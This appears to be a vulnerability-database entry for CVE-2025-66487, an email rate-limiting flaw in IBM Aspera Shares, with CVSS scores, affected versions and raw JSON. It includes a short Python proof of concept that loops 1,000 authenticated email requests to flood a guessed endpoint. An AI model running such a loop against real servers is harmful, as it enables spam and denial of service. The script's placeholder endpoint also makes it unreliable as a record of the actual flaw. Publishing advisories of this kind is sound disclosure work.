Security Vulnerability Report
中文
CVE-2025-66487 CVSS 2.7 LOW

CVE-2025-66487

Published: 2026-04-01 23:17:03
Last Modified: 2026-04-03 19:47:57

Description

IBM Aspera Shares 1.9.9 through 1.11.0 does not properly rate limit the frequency that an authenticated user can send emails, which could result in email flooding or a denial of service.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:ibm:aspera_shares:*:*:*:*:*:*:*:* - VULNERABLE
IBM Aspera Shares 1.9.9
IBM Aspera Shares 1.10.0
IBM Aspera Shares 1.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL for the email sending endpoint # Replace with the actual endpoint based on the specific version target_url = "https://<aspera-shares-host>/api/email/send" # Authentication credentials (High privileges required) # Replace with valid credentials auth_cookies = { "session_id": "valid_session_cookie_here" } # Payload for the email request email_payload = { "to": "[email protected]", "subject": "Flood Test", "body": "This is a test email for vulnerability demonstration." } print("[+] Starting PoC for CVE-2025-66487...") try: # Loop to send emails without rate limiting for i in range(1000): response = requests.post(target_url, data=email_payload, cookies=auth_cookies) if response.status_code == 200: print(f"[+] Email {i+1} sent successfully.") else: print(f"[-] Failed to send email {i+1}. Status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}") print("[+] PoC execution finished.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66487", "sourceIdentifier": "[email protected]", "published": "2026-04-01T23:17:02.600", "lastModified": "2026-04-03T19:47:56.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Aspera Shares 1.9.9 through 1.11.0 does not properly rate limit the frequency that an authenticated user can send emails, which could result in email flooding or a denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:aspera_shares:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.9.9", "versionEndExcluding": "1.11.1", "matchCriteriaId": "E91033A7-CCAD-49AB-814E-73898AC951E9"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7267848", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}